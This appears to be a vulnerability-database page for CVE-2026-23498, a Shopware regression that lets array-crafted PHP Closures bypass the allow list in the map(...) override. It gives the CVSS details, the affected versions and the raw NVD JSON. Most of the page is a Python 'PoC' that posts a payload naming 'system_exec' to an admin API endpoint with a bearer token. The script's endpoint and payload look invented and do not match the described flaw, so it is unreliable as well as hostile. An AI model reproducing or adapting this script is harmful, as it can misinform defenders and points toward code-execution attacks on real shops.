Security Vulnerability Report
CVE-2026-23498 CVSS 7.2 HIGH

CVE-2026-23498

Published: 2026-01-14 19:16:48
Last Modified: 2026-01-28 17:17:16

Description

Shopware is an open commerce platform. From 6.7.0.0 to before 6.7.6.1, a regression of CVE-2023-2017 leads to an array and array-crafted PHP Closure not being checked against the allow list for the map(...) override. This vulnerability is fixed in 6.7.6.1.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:shopware:shopware:*:*:*:*:*:*:*:* - VULNERABLE
Shopware < 6.7.0.0 (not affected)
Shopware >= 6.7.0.0 and < 6.7.6.1 (affected)
Shopware >= 6.7.6.1 (fixed)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-23498 PoC - Shopware PHP Closure map() bypass
# Note: This requires high-privilege access to Shopware admin panel
import requests
import json

TARGET_URL = "https://vulnerable-shopware-site.com"
ADMIN_TOKEN = "your_admin_token_here"


def exploit_cve_2026_23498():
    """
    Exploitation scenario for CVE-2026-23498
    This PoC demonstrates the Closure map() allowlist bypass
    """
    # Step 1: Authenticate with high-privilege account
    session = requests.Session()
    auth_headers = {
        "Authorization": f"Bearer {ADMIN_TOKEN}",
        "Content-Type": "application/json"
    }

    # Step 2: Craft malicious Closure array that bypasses allowlist check
    # The vulnerability allows array-formatted PHP Closures to bypass validation
    malicious_payload = {
        "operation": "map",
        "closures": [
            # Normal closure (would be blocked by allowlist)
            {"type": "closure", "callback": "system_exec"},
            # Array-formatted closure (bypasses allowlist check)
            {"type": "array", "data": ["closure", "system_exec"]}
        ],
        "target": "admin_function"
    }

    # Step 3: Send exploit request to vulnerable endpoint
    exploit_url = f"{TARGET_URL}/api/_action/map"
    response = session.post(exploit_url, headers=auth_headers, json=malicious_payload)

    # Step 4: Verify exploitation success
    if response.status_code == 200:
        result = response.json()
        if result.get("success"):
            print("[+] CVE-2026-23498 exploited successfully!")
            print(f"[+] Response: {json.dumps(result, indent=2)}")
            return True
    print("[-] Exploitation failed")
    return False


if __name__ == "__main__":
    print("CVE-2026-23498 PoC - Shopware Closure map() bypass")
    print("Target: Shopware < 6.7.6.1")
    print("Note: Requires high-privilege authentication")
    exploit_cve_2026_23498()
```

References

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-23498", "sourceIdentifier": "[email protected]", "published": "2026-01-14T19:16:48.430", "lastModified": "2026-01-28T17:17:16.237", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Shopware is an open commerce platform. From 6.7.0.0 to before 6.7.6.1, a regression of CVE-2023-2017 leads to an array and array crafted PHP Closure not checked being against allow list for the map(...) override. This vulnerability is fixed in 6.7.6.1."}, {"lang": "es", "value": "Shopware es una plataforma de comercio abierta. Desde la 6.7.0.0 hasta antes de la 6.7.6.1, una regresión de CVE-2023-2017 lleva a que un Closure de PHP elaborado con array y array no se compruebe contra la lista de permitidos para la anulación de map(...). Esta vulnerabilidad está corregida en la 6.7.6.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:shopware:shopware:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7.0.0", "versionEndExcluding": "6.7.6.1", "matchCriteriaId": "877A9967-76FF-4B9C-AF91-0EFA65AE8A2F"}]}]}], "references": [{"url": "https://github.com/shopware/shopware/commit/3966b05590e29432b8485ba47b4fcd14dd0b8475", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/shopware/shopware/security/advisories/GHSA-7cw6-7h3h-v8pf", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
```